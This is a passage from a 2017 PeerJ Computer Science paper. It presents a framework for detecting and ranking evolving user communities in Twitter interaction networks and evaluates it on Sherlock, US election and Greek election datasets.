the other hand it should be as less of a computational burden as possible to be applicable to massive networks. However, community matching techniques presume a zero-to-one or one-to-one mapping between users in two communities, thus not supporting the identification of the above conditions in the lifecycle of a dynamic community. In order to overcome this predicament, we employ a heuristic by Greene, Doyle & Cunningham (2010) relying on a user-defined threshold to determine the matching between communities across different timeslots. The algorithm steps are presented in more detail as follows. Initially, the first set of communities {C11,C21,...,Ci1,...,Ck1} (i.e., the first snapshot) is extracted by applying the Infomap community detection algorithm (Rosvall & Bergstrom, 2008) to the G1 graph. A dynamic community marker Ti,1 (where i=[1,k]) is assigned to each community from this snapshot. Next, the second set of communities is extracted from the G2 graph and a matching process is performed between all the community combinations from the two consecutive snapshots in order to determine any possible evolution from the first snapshot to the next. The dynamic communities T(1,2,...,k),1 are then updated based on that evolution. For example, if Ca1 does not appear in the second snapshot, Ta,1 is not updated; a split is registered if the community appears twice in the new timeslot, and a merger marker is assigned if two or more communities seem to have merged into one. One of the problems community evolution detection processes face is the lack of consistency in the users’ behavior. The lack of consistent and sequential behavior results in communities being labeled dead when in fact they could just be delayed. In order to avoid potential false positives of community deaths, a trail of several snapshots is retained; meaning that the search covers a wider range of timeslots in total instead of just the Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 13/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 5 A study of six potential dynamic communities tracked over three timeslots. The seven most frequent conditions that communities might experience are birth (concentric circles), death (no exiting arrow), irregular occurrences (skipped timeslot), merging and splitting, as well as growth and decay. immediate previous one. The length of the trail depends on the selected granularity of the discretization process, in a manner that a meaningful period is covered (i.e., if the sampling is performed on a daily basis, the trail will consist of seven timeslots in order to provide a week’s depth). Hence, if the evolution of a community is not detected in the immediate to last timeslot, the system queries the D previous ones in a ‘‘last come, first served’’ order. This means that the search progresses through the trail until a match is found, in which case the search is terminated and the dynamic community is observed to have skipped a timeslot. If no matching community is detected, the community is considered dead. The proof of necessity for such a delay is shown on Table 2. The evolution detection procedure is repeated until all graphs have been processed. It should be noted that the decision for the delay being set to only a few timeslots instead for the whole trail, was made by considering the computational burden of the system in conjunction to the fact that people lose interest. If the users comprising the community do not engage in the discussion for a significant period of time, it would be safe to say, that the community has been dismantled. In order to determine the matching between communities, the Jaccard coefficient is employed (Jaccard, 1912). Following comparative preliminary results between the Jaccard Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 14/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 and the Sorensen index (dice coefficient) (Sørensen, 1948), the former was selected due to its efficiency. In fact, the Jaccard similarity is still one of the most popular similarity measures in community matching (Yang, McAuley & Leskovec, 2013; Alvarez, Sanz-Rodríguez & Cabrera, 2015). The similarity between a pair of consecutive communities Cin and C(i(n−td)) is calculated by use of the following formula, where timeslot delay td ∈[1,7]: J ( Cin,Ci(n−td) ) = ∣∣Cin∩Ci(n−td)∣∣∣∣Cin∪Ci(n−td)∣∣. (1) If the similarity exceeds a matching threshold φ, the pair is matched and Cin is added to the timeline of the Ti,n dynamic community. As in Greene, Doyle & Cunningham (2010), Takaffoli et al. (2011) and Lu & Brelsford (2014), the similarity threshold φ is a constant threshold. Following a more extensive analysis on the impact of the threshold selection, Greene suggested the use of 0.3 which concurs with our own results. Figure 4 illustrates that 0.2 allows the creation of many strings of small communities, whereas 0.5 suppresses a lot of communities from the middle region which holds most of the information required for a fuller investigation. Dynamic community ranking using TISCI Although the evolution detection algorithm is efficient enough to identify which communities are resilient to the passing of time, it does not provide a measure as to which communities are worth looking into and which are not. A solution to this shortcoming is presented here via the TISCI score that ranks the evolving communities on the basis of seven distinct features which represent the notions of Time, Importance, Structure, Context and Integrity. Specifically, we employ persistence and stability which are temporal measures, normalized-community-centrality which is a relational importance measure, community-size which is a structural measure, mean-textual-entropy and unique-URL average which are contextual measures, and an integrity coefficient inspired by the ‘‘ship of Theseus’’ paradox. Persistence is defined as the characteristic of a dynamic community to make an appearance in as many timeslots as possible (i.e., overall appearances/total number of timeslots), and stability as the ability to appear in as many consecutive timeslots as possible disregarding the total number of appearances (i.e., overall consecutive appearances/total number of timeslots). Persistence(Tx,y)= ∑m n=1δ[a[n]] m 2 Stability(Tx,y)= ∑m n=2δ[a[n]−a[n−1]] m−1 3 where δ is the impulse function, m represents the total number of timeslots, x,y are the labels of the oldest community in Tx,y and a[n]= { 1 ∀Ci,n∈Tx,y 0 otherwise } . (4) Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 15/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 We expect consistent dynamic communities to be both persistent and stable as the combination of these features shows either a continuous interest in a subject or its evolution to something new. As such we combine the two features into one via multiplication. Figure 4 shows how stable and how persistent the communities are with respect to the actual number of persistent users. Moreover, it shows the number of people who persist in time within a community in respect with the community’s persistence and stability for the Infomap as well as for the Louvain and Newman methods. Google’s PageRank (Brin & Page, 1998) is used as the centrality feature which measures the number and quality of links to a community in order to determine an estimate of how important that community is. The same measure is also applied to the users from every dynamic community, ranking them according to their own centrality and thus providing the most influential users per timeslot. There is however a difference between the two in how the final centrality values are extracted, since different timeslots create different populations between the static graphs. Although this does not affect the users’ centralities as they are compared to each other within the timeslot, it does however influence the communities’ centrality measures due to the difference in populations. In order to compare centrality measures from different timeslots, we employ the normalized PageRank solution as proposed in Berberich et al. (2007). The Mean Centrality as it is used here is defined as: MC(Tx,y)= ∑m n=1 ∑k i=1normPR(Cin∈Tx,y)∑m n=1 ∑k i=1a[in] (5) where k is the number of communities per timeslot. One of the measures that provides a sense of popularity is virality which in the case of Twitter datasets translates into multiple bursts of mentions in a short time. This can happen either due to an event or because an influential user (e.g., major newspaper account) posted something of interest. On the other hand, Lu and Berlsford used the lack of increased community size as an indication of disruption in the telecommunication services. For this reason we consider the increased size of a dynamic community as a feature that requires attention. Here, the feature of size is defined as the average size of the static communities that comprise it. The integrity measure employed is an extension of the ship of Theseus coefficient. The ship of Theseus, also known as Theseus’s paradox, is a thought experiment that raises the question of whether an object which has had all its components replaced remains fundamentally the same object (Rea, 1995). We apply this theory to find out the transformation sustained by the dynamic community by calculating the number of consistent nodes within the communities which represents the integrity and consistency of the dynamic community. Twitter datasets differ quite a lot to other online social networks since the user is restricted to 140 characters of text. Given this restriction, we assume that it is safe to say that there is a connection between the entropy of tweeted words used in a community (discarding URLs, mentions, hashtags and stopwords), the effort the users put into posting those tweets, and the diversity of its content. Whether there is a discussion between the Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 16/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 users or a presentation of different events, high textual entropy implies a broader range of information and therefore more useful results. An added bonus to this feature is that spam and empty tweets containing only hashtags or mentions, as is the case in URL attention seeking tweets, rank even lower than communities containing normal retweets. For the ranking we employ the mean textual diversity of the dynamic community. The textual diversity in a community Ci is measured by Shannon’s entropy H of the text resulting from the tweets that appear in that community as follows: H(Ci)= k∑ m=1 −p(Wm)log2(p(Wm)) (6) where p(Wm) is the probability of a word Wm appearing in a community containing M words and is computed as follows: p(Wm)=(freq(Wm))/(M). (7) The second contextual feature to be employed regards the references cited by the users via URLs in order for them to point out something they consider important or interesting. In fact, the URLs hold a lot more information than the single tweet and as such we also consider it useful for discovering content-rich communities. The ranking in this case is performed by simply computing the average of unique URLs in each dynamic community over time. Since we have an array of six features, we have to combine them into a single value in order to rank the dynamic communities. The final ranking measure for every dynamic community is extracted by employing the Reciprocal Rank Fusion (RRF) (Cormack, Clarke & Buettcher, 2009) method; a preference aggregation method which essentially provides the sum of the reciprocals ranks of all extracted aforementioned features Q: RRF = |Q|∑ q=1 1 α+rankq (8) where α is a constant which is used to mitigate the impact of high rankings by outlier systems. Cormack, Clarke & Buettcher (2009) set the constant to 60 according to their needs although the choice, as they state, is not critical and thus we prefer a lower score equal to the number of dynamic communities to be considered. Despite its simplicity, the RRF has proven to perform better than many other methods such as the Condorset Fuse or the well established CombMNZ (Cormack, Clarke & Buettcher, 2009) and is considered one of the best baseline consensus methods (Volkovs, Larochelle & Zemel, 2012). In addition, it requires no special voting algorithm or global information and the ranks may be computed and summed one system at a time, thus avoiding the necessity of keeping all the rankings in memory. However, this preference aggregation method is not without flaws, as it could potentially hide correlations between feature ranks. Although, in other applications this could pose a problem, as shown in Table 3 the lack of correlation between the features’ ranks encourages us to employ this simple but useful method. The correlation was measured using the Spearman rank-order correlation coefficient. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 17/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Table 3 Feature ranking similarity comparison using Spearman’s rank correlation coefficient averaged across all three datasets. Centrality Perstability Size Textdiversity Theseus Urldiversity TISCI Centrality 1.0 0.046 0.051 0.032 −0.021 0.006 0.021 Perstability 0.046 1.0 0.032 0.154 0.015 0.047 0.029 Size 0.051 0.032 1.0 0.156 0.005 0.002 0.011 Textdiversity 0.032 0.154 0.156 1.0 0.034 0.055 0.029 Theseus −0.021 0.015 0.005 0.034 1.0 −0.008 0.016 Urldiversity 0.006 0.047 0.002 0.055 −0.008 1.0 −0.01 TISCI 0.021 0.029 0.011 0.029 0.016 −0.01 1.0 Complexity and scalability When it comes to temporal interaction analysis, scalability is always an issue. The cost of the TISCI framework is O(m+k2+c ·w) where m are the number of edges for the Infomap method, k is the number of communities of each row in the evolution detection scheme, and c and w are the numbers of dynamic communities and words in each community in the ranking stage. Although currently, the framework would not scale well due to the squared complexity of the evolution detection process, future work will involve the use of Local Sensitivity Hashing to speed up the operation. EXPERIMENTAL STUDY Despite the proliferation of dynamic community detection methods, there is still a lack of benchmark ground truth datasets that could be used for the framework’s testing purposes. Instead, the results presented in this paper were attained by applying our framework on three Twitter interaction network datasets as described in the following section. Datasets The tweets related to the US election of 2012 were collected using a set of filter keywords and hashtags chosen by experts (Aiello et al., 2013). Keywords and hashtags in Greek and English containing all the Greek party names as well as their leaders’ were used for the Greek elections of 2015. Last, variations of the names ‘Sherlock’ and ‘Watson’ were used for the Sherlock series dataset. We chose these three datasets as they all share a number of useful features but also have significant differences as one may deduce from the data description and the basic network characteristics which are presented in Table 4. On the one hand all of the datasets regard major events that generate a large volume of communication and are mostly dominated by English-language contributors, making analysis simpler for the majority of researchers. On the other hand, the US election (including voting, vote counting, speculation about results and subsequent analysis) lasted two days, whereas the Greek elections and the Sherlock frenzy lasted 10 days and two weeks, respectively. Similarly, in an event focused discussion such as the US election, almost all the focus is either on specific events/announcements or specific people associated with the events, whereas topics in a general discussion regarding a fictitious character tend to be more spread out over time and to overlap with other topics while becoming more active when specific events take place. These differences help us understand the ways that social networks are used in Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 18/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Table 4 Dataset statistics. Sherlock US Election GR Election Jan GR Election Sep # of tweets 2,904,321 4,148,782 2,748,613 1,084,304 # of tweets with mentions 1,412,358 2,967,779 1,836,296 622,590 # of hashtags 643,132 4,286,418 1,399,109 482,376 # of URLs 139,663 675,862 581,823 215,530 # of unique users 542,254 2,013,301 555,859 166,807 # of edges 1,595,435 4,190,883 2,368,396 744,824 # of communities 186,045 416,181 108,532 31,518 # reduced communities 37,106 73,170 32,231 11,681 # of evolution steps 9,211 8,843 4,336 1,610 # of dynamic communities 3,457 3,936 1,758 639 Sampling time 24 h 3 h 24 h 24 h very different circumstances as well as that the variation in temporal structure depends heavily on the query itself. Sherlock Holmes dataset This real-world dataset is a collection of mentioning posts acquired by a crawler that collected tweets containing keywords and hashtags which are variations of the names ‘Sherlock’ and ‘Watson.’ The crawler ran over a period of two weeks; from the 31st of December 2013 to the 14th of January 2014, extracting messages containing mentions. The evolution detection process discovered 9,211 dynamic communities comprising 178,361 snapshot communities. The information we sought pertained to the various communities created between people who interact via mentions and are interested in the BBC’s Sherlock series, people who are influenced by these communities and any news that might give us more insight on this world wide phenomenon. The dynamic community structure resulting from this dataset is totally different from the two election ones in more ways than one. Initially, there are many diverse and smaller communities which persist over time that seem to be fairly detached from the rest. This means that the interest here is widely spread and the groups of people discussing the imminent or last episode of the series are smaller indicating that in most cases we are looking into friends chatting online. Nonetheless, the user can still acquire a variety of information such as the general feeling of the viewers, several spoilers regarding each episode, a reminder about when each episode starts and on what day, and also statistics on the viewership of the series. The latter was extracted from one of the largest communities which informed us that not only was the first episode viewed by an average of 9.2 million viewers but also that Chinese fans relish the series and especially the love theory between the two main characters (http://www.bbc.com/news/blogs-china-blog-25550426). Other typical topics of conversation include the anticipation of the series, commentary regarding the quality of the episode, commentary regarding the character and many more typical lines of discussion. A short list of findings is presented on Table 5. What is interesting enough is that conversations and opinions regarding the bad habits or the sexuality of the Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 19/34 https://peerj.com http://www.bbc.com/news/blogs-china-blog-25550426 http://dx.doi.org/10.7717/peerj-cs.107 Table 5 Key findings from the Sherlock dataset. Finding URL (if available) 1 Creators reveal they already have series four mapped out https://goo.gl/5ZDCMt 2 Cumberbatch’s parents make Sherlock cameo https://goo.gl/qPgtAj 3 Chinese fans relish new sherlock gay love theory as fans relish new series 4 Episode scores highest timeshifted audience in UK TV history https://goo.gl/PkfHJs 5 January 6th is Sherlock’s birthday character are pretty high in the rankings and that there are plenty of non-English speaking communities. One last remark concerns the DyCCo (ranked #9) which contains a plethora of shopping labels. Usually, consecutive shop labels are an indication of spam as they are usually consistent, stable and contain URLs with the sole purpose to lure a potential customer. However, in this case the shopping labeled communities contain references to books, movies and the original series of Sherlock Holmes sold by major retailers, thus classifying the DyCCo as one that a Sherlock enthusiast would actually be interested in. US election dataset The United States presidential election of 2012 was held on November 6th in 2012. The respective dataset was collected by using a set of filter keywords and hashtags chosen by experts (Aiello et al., 2013). Despite retrieving tweets for specific keywords only, the data collected was still too large for a single user to organize and index in order to extract useful information. Here, the granularity selection of three hours was made based on the fact that there is a discrete but not wild change in activity. By employing a coarser granularity instead of an hourly one serves to reduce the time zone effect. Moreover, since all four political debates in 2012 lasted for an hour and a half, then twice the span of a debate seemed like a reasonable selection for Twitter users to engage in a political discussion. Studying the top 20 DyCCos provides a variety of stories which does not only contain mainstream news but other smaller pieces of information that journalists seek out. The first one for example, which is also the most heavily populated, regards a movement of motivating women into voicing their opinion by urging them to post photos of their ‘‘best voting looks’’ but also pleading for Tony Rocha (radio producer) to use his influence for one of the nominees. The first static community alone includes 2,774 people, some of which are @KaliHawk, @lenadunham, @AmmaAsante, @marieclaire and others. Overall, during Election Day people are mostly trying to collect votes for their candidate of choice by either trying to inspire themselves or ask from a celebrity to do so; whereas after the fact, everyone is either posting victory or hate posts, or commenting on what the election will bring the following day, whether or not the election was falsified/rigged. At all times people are referencing a number of journalists, bloggers and politicians (Herman Cain, Pat Dollard) as well as various newspapers, TV channels and famous blogs. Other examples include comments on racism stopping due to the reelection, a book on President Obama, Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 20/34 https://peerj.com https://goo.gl/5ZDCMt https://goo.gl/qPgtAj https://goo.gl/PkfHJs http://dx.doi.org/10.7717/peerj-cs.107 Table 6 Key findings from the US election dataset. Finding URL (if available) 1 Women’s voting motivational movement on Instagram https://goo.gl/OKs17u 2 President Obama hoops with S. Pippen on Election Day https://goo.gl/Ybg83Z 3 Iran and Russia among countries with messages for Obama https://goo.gl/hgiaaN 4 Mainstream media tipped the scales in favor of Obama foxNews(removed) 5 Anti-Obama protests escalate at university WashPost(removed) Table 7 Key findings from the Greek elections datasets. Finding URL (if available) 1 Euro hits an 11-year low following the Syriza party victory (removed) 2 Candidate slapped pollster over bad numbers announcement (removed) 3 Tsipras regains slim lead hours ahead of Greek vote https://goo.gl/fZA0UX 4 Vandalisms at Syriza and New Democracy polling centers https://goo.gl/3YEfRP 5 Far-right party is the most voted by the unemployed https://goo.gl/Ydzd8R posts by a number of parishes and many more which unfortunately cannot be illustrated in this manuscript due to space restrictions. However, a short list of non-mainstream findings is presented on Table 6. One of the main anticipated characteristics of this particular set is that the news media, political analysts, politicians, even celebrities are heavily mentioned in the event of an election. Greek election datasets The two Greek elections of 2015 were held on January 25th and on September 20th and the collection of corresponding tweets was made using Greek and English keywords, hashtags and user accounts of all major running parties and their leaders. Although participation in the second election was almost cut in half with regard to the first, there are a few similarities in the dynamic communities that are of interest. The top 20 DyCCos of both datasets surfaced groups of an extremely wide and diverse background. Groups from Turkey, Italy, Spain and England anticipated Syriza’s (center-left anti-austerity party) potential wins in both elections and joined in to comment on all matters such as the Grexit, the future of the Greek people, how the Euro hit an 11 year low following the victory of the anti-austerity party but also that the markets managed to shake off the initial tremors created by it. Conspiracy tweets were also posted within a community mentioning operation Gladio; a NATO stay-behind operation during the Cold War that sought to ensure Communism was never able to gain a foothold in Europe, which then evolved into sending warnings to the Syriza party as Greece was supposedly being framed as an emerging hub for terrorists. A short list of non-mainstream findings is presented on Table 7. Although there were a lot of interesting international pieces of commentary such as the above, the framework did not miss the local communities where a strong presence was achieved by the far-left supporters, the Independent Greeks supporters, and a slightly Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 21/34 https://peerj.com https://goo.gl/OKs17u https://goo.gl/Ybg83Z https://goo.gl/hgiaaN https://goo.gl/fZA0UX https://goo.gl/3YEfRP https://goo.gl/Ydzd8R http://dx.doi.org/10.7717/peerj-cs.107 milder presence from the right wing and extreme-right wing supporters all of whom were rooting for their party and pointing out the mistakes of the opposing ones. One of the similarities between the two election datasets which is rather impressive lies in the almost identical structure of the two evolutions as shown by the respective heatmaps in the Evaluation section. It is also worth mentioning that many influential users (e.g., @avgerinosx, @freedybruna) and politicians (e.g., @panoskammenos, @niknikolopoulos) who were extremely active in the first election, were also present in the second one. Data processing Prior to the framework application, the network data is preprocessed as follows. Initially, all interaction data is filtered by discarding any corrupt messages, tweets which do not contain any interaction information and all self-loops (self-mentions) since they most frequently correspond to accounts who are trying to manipulate their influence score on Twitter. The filtered data is then sampled resulting in a sequence of activity-based snapshots. Figure 2 displays the mentioning activity of the four twitter networks. The process which puts the greatest computational burden on the framework involves the evolution detection. In order to speed up the searching operation, instead of using strings, the users’ names are hashed resulting in communities comprising sets of hashes. Moreover, we discard all the users’ hashes which appear strictly in a single timeslot since they are considered temporal outliers. However, they are not discarded from the metadata container as they may provide useful information. Two additional acceleration measures are: the discarding of communities with a population of less than three users, and, similarly to the scheme proposed by Arasu, Ganti & Kaushik (2006), a size comparison check prior to the Jaccard similarity calculation (i.e., if the size difference between the communities disallows a threshold overcome, there is no point in measuring their similarity). Every community in every timeslot is used as a query in a maximum of D older timeslots, essentially searching for similar communities in a D+1 timeslot window. Whenever a similar community is found the search is halted and two possible scenarios take place. Either a new dynamic community is initiated or the query is added to an already active dynamic community. Each of these dynamic communities contains information such as text, hashtags, URLs, user centralities and edges which are all stored in a Dynamic Community Container (DyCCo). Following the formation of these DyCCos, a TF-IDF procedure is applied in order to extract valuable keywords and bigrams that will pose as a DyCCo guideline for the potential user that might interest him/er more. The corpus of the dataset (IDF) is created by using the unique set of words contained in each timeslot of every available dynamic community and the term frequency is computed by using the unique set of tweets within the community (i.e., only one of the repetitions is used in the case that the sentence was retweeted). For the purposes of better illustration and easier browsing, the products of the framework as seen in Fig. 6 consist of: • a word cloud per dynamic community containing the most popular: (a) hashtags, (b) keywords, (c) bigrams, (d) domains and (e) text items; Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 22/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 (a) (b) (c) Figure 6 DyCCo structure and content illustration for the Sherlock Twitter dataset. (A) A color heatmap displaying the evolution of the top 20 dynamic communities of BBC’s 2014 Sherlock TV series dataset. Each evolution series contains a characterization of the community based on the contained URLs. The background color varies between shades of blue and is an indication of the logged size of the specific community. The population increases as the shade darkens (the numbers on the right represent the label of each dynamic community). (B) Wordclouds of the most popular keywords, bigrams, hashtags, tweets and URLs acquired from community6, timeslot 3. (C) The corresponding graphical illustration of community6, timeslot 3 under study. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 23/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 7 Color heatmap displaying the evolution of the top 20 dynamic communities of the 2012 US election dataset. Each evolution series contains a characterization of the community based on the con- tained URLs. The background color varies between shades of blue and is an indication of the logged size of the specific community. The population increases as the shade darkens. • the ten most influential users from each community which could provide the potential journalist/analyst with new users who are worth following The color heatmap in the figure represents community size but can be adjusted to also give a comparative measure of centrality or density. By using this DyCCo containing framework, the user is provided with a more meaningful view of the most important communities as well as an insight to the evolving reaction of the public with respect to various events. The respective color heatmaps for the US election and the Greek election datasets are presented in Figs. 7–9. Evaluation While executing preliminary experiments it was concluded that the framework can undoubtedly provide the user with some useful information whether the query regarded politics, television series, specific events or even specific people/celebrities. Unfortunately, there is no known method to which we can compare the performance of our framework. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 24/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 8 Color heatmap displaying the evolution of the top 20 dynamic communities of the January, 2015 Greek election dataset. Each evolution series contains a characterization of the community based on the contained URLs. The background color varies between shades of blue and is an indication of the logged size of the specific community. The population increases as the shade darkens. Due to this predicament, we took the opportunity to introduce a content-based evaluation scheme through which we may compare the effectiveness of the proposed framework to the size-grounded ranking baseline method used in Lu & Brelsford (2014). Since it is immensely difficult to evaluate community importance based on the tweets themselves, we employed Amazon’s Alexa service and the contained URLs of each static community to extract the category to which it belonged. Alexa requires a domain as input and returns a string of categories in a variety of languages to which it belongs. In order to avoid duplicates, categories in a language other than English were translated automatically using Google’s translating service. Unfortunately, most of the domains, even popular ones, either returned a vary vague category (e.g., internet) or none at all. Hence, manual domain categorization was also necessary in order to include the most popular of domains. Specifically, the URLs we categorized using the following labels: television, video, photo, news, social networking, blog, conspiracy, personal sites, politics, shop, arts and spam. The dynamic communities of the three Twitter datasets combined contained 78,499 URLs which were reduced to 8,761 unique domains. A mere 2,987 of these domains were categorized either by Alexa or manually, but the overall sample of categorized URLs was Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 25/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 9 Color heatmap displaying the evolution of the top 20 dynamic communities of the Septem- ber, 2015 Greek election dataset. Each evolution series contains a characterization of the community based on the contained URLs. The background color varies between shades of blue and is an indication of the logged size of the specific community. The population increases as the shade darkens. significant enough to be used in the categorization process. The result of the most popular category for each community is shown in the color heatmaps displayed in Figs. 6A and 7–9 for each dataset. Besides the labeling, the heatmap also provides information regarding the size of the community. The darker the colors get, the larger the community. By combining the two, the user is provided with a relatively good idea of where to begin his/er search. The premise on which the evaluation is based is that the content of the top 10–20 dynamic communities’ content should match the category of the query similarly to a search engine, since most users will not go past these many results. For example, if the queried event concerns an election, the content of the top communities should match that of news, politics, conspiracies, etc. On the other hand, if it concerns a television series, it should contain videos, television and other opinion references (social networks), art (photos), shops where the series is available, etc. The content comparison as represented by the sum of all categories (where available) in the dynamic communities between the proposed and the baseline ranking methods is shown in Fig. 10. The TISCI method seems to either surpass or tie the baseline method in the categories of interest. The single centrality Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 26/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 (a) (b) (c) Figure 10 Content comparison between the proposed and the baseline ranking methods. Results for the (A) 2014 Sherlock series, (B) 2012 US election and (C) January 2015 Greek election datasets. ranking method is used here as an indication to the fact that the proposed method performs well as a whole even when independent features do not. The secondary evaluation scheme explores the diversity fluctuation. Greater diversity implies more infomation and therefore more useful results. Employing the entropy feature described in the community ranking section but substituting bigrams for single words in order to increase the sense of diversity, we compute the mean bigram entropy for all timeslots in the top 20 communities and compare the result of the proposed method to that of the baseline. Figures 11–13 show the comparison between the two methods for all three datasets in which the proposed method seems to retrieve more diverse communities in most timeslots. Table 8 presents the total bigram entropy for all the timeslots for each dataset. With the exception of the Greek election dataset in which the difference is quite small, the proposed method performs definitely better compared to the baseline. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 27/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 11 Mean bigram entropy. Comparison between the proposed and the Lu & Brelsford (2014) (size) ranking methods for the Sherlock dataset. Figure 12 Mean bigram entropy. Comparison between the proposed and the Lu & Brelsford (2014) (size) ranking methods for the US election dataset. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 28/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 Figure 13 Mean bigram entropy. Comparison between the proposed and the Lu & Brelsford (2014) (size) ranking methods for the Greek election dataset (January 2016). Table 8 Total bigram entropy resulting from the proposed and baseline methods for all three datasets. Sherlock US election Greek election TISCI 33.63 18.23 26.98 Lu and Brelsford 29.87 14.62 26.23 CONCLUSIONS The paper presented a framework for the extraction of useful information from OSN interactions. The basis of the framework is the study of the temporal structure and the monitoring of the evolution that the OSN communities undergo over time. The contribution of the proposed method lies in the ranking of the detected dynamic communities in respect to structural, evolutionary and importance features. By ranking the communities, the corresponding metadata containers (DyCCos) are also ranked, thus providing the user with popular URLs, tweets and wordclouds of keywords and bigrams. The experimental analysis was based on three evolutionary networks extracted from user interactions in Twitter. When applied on these networks, the framework uncovered a large number of dynamic communities with a variety of evolutionary characteristics. Unfortunately, it also uncovered a lack in a groundtruth evaluation scheme. In order to fill this need, we proposed a content-based evaluation process which hopefully will motivate more research into this direction. The conducted experiments highlighted the potential of the proposed framework for discovering persistent, interesting users, newsworthy pieces of information and real-world incidents around topics of interest as well as a means to Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 29/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.107 follow a story over consecutive, or even non-consecutive, time-lapses. They also revealed the complexity of the analysis and evaluation processes due to the large scale of data to be analyzed and the absence of real ground truth data which the area of dynamic community detection and ranking clearly lacks. Future work will involve fitting the framework with a community detection method that allows overlapping, the implementation of a better means of presentation than wordclouds and heatmaps, the discovery of a non-heuristic way of selecting the sampling time and the employing of local sensitivity hashing to further speed up the evolution detection procedure. ADDITIONAL INFORMATION AND DECLARATIONS Funding All the funding received during this study was provided by the STEP H2020 project, funded by the European Commission (under grant agreement 649493), the REVEAL FP7 project, funded by the European Commission (under contract number FP7-610928), and the SocialSensor FP7 project funded by the EC under contract number 287975. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Commission: 649493, FP7-610928. Competing Interests The authors declare there are no competing interests. Author Contributions • Konstantinos Konstantinidis conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Symeon Papadopoulos conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • Yiannis Kompatsiaris reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Github: https://github.com/dinos66/peerJdynamicCommunityRanking. REFERENCES Aiello L, Petkos G, Martin C, Corney D, Papadopoulos S, Skraba R, Goker A, Kom- patsiaris I, Jaimes A. 2013. Sensing trending topics in twitter. Multimedia, IEEE Transactions on 15(6):1268–1282 DOI 10.1109/TMM.2013.2265080. Konstantinidis et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.107 30/34 https://peerj.com https://github.com/dinos66/peerJdynamicCommunityRanking http://dx.doi.org/10.1109/TMM.2013.2265080 http://dx.doi.org/10.7717/peerj-cs.107 Aktunc R, Toroslu IH, Ozer M, Davulcu H. 2015. A dynamic modularity based commu- nity detection algorithm for large-scale networks: DSLM. In: Proceedings of the 2015 IEEE/ACM international conference on advances in social networks analysis and mining 2015. New York: ACM, 1177–1183. Albano A, Guillaume J-L, Le Grand B. 2014. On the use of intrinsic time scale for dynamic community detection in social networks. In: Proceedings of the IEEE 8th international conference on research challenges in information Science. Piscataway, 978–981. Alvarez AJ, Sanz-Rodríguez CE, Cabrera JL. 2015. Weighting dissimilarities to detect communities in networks. Philosophical Transactions of the Royal Society A: Math- ematical, Physical and Engineering Sciences Epub ahead of print November 2 2015 DOI 10.1098/rsta.2015.0108. Arasu A, Ganti V, Kaushik R. 2006. Efficient exact set-similarity joins. In: Proceedings of the 32nd international conference on very large data bases, VLDB ’06. VLDB Endowment, 918–929. Asur S, Parthasarathy S, Ucar D. 2007. An event-based framework for characterizing the evolutionary behavior of interaction graphs. In: Berkhin P, Caruana R, Wu X, eds. KDD. New York: ACM, 913–921. Berberich K, Bedathur S, Weikum G, Vazirgiannis M. 2007. Comparing apples and oranges: normalized pagerank for evolving graphs. In: Proceedings of the 16th international conference on world wide web. New York: ACM, 1145–1146. Blondel VD, Guillaume J-L, Lambiotte R, Lefebvre E. 2008. Fast unfolding of com- munities in large networks. Journal of Statistical Mechanics: Theory and Experiment 2008(10):P10008 (12pp). Brin S, Page L. 1998. The anatomy of a large-scale hypertextual Web search engine. Computer Networks and ISDN Systems 30(1–7):107–117 DOI 10.1016/S0169-7552(98)00110-X. Cazabet R, Amblard F. 2014. Dynamic community detection, chapter D. In: Alhajj R, Rokne J, eds. Encyclopedia of social network analysis and mining. New York: Springer New York, 404–414. Cazabet R, Takeda H, Hamasaki M, Amblard F. 2012. Using dynamic community detection to identify trends in user-generated content. Social Network Analysis and Mining 2(4):361–371 DOI 10.1007/s13278-012-0074-8. Cormack GV, Clarke CLA, Buettcher S. 2009. Reciprocal rank fusion outperforms condorcet and individual rank learning methods. In: 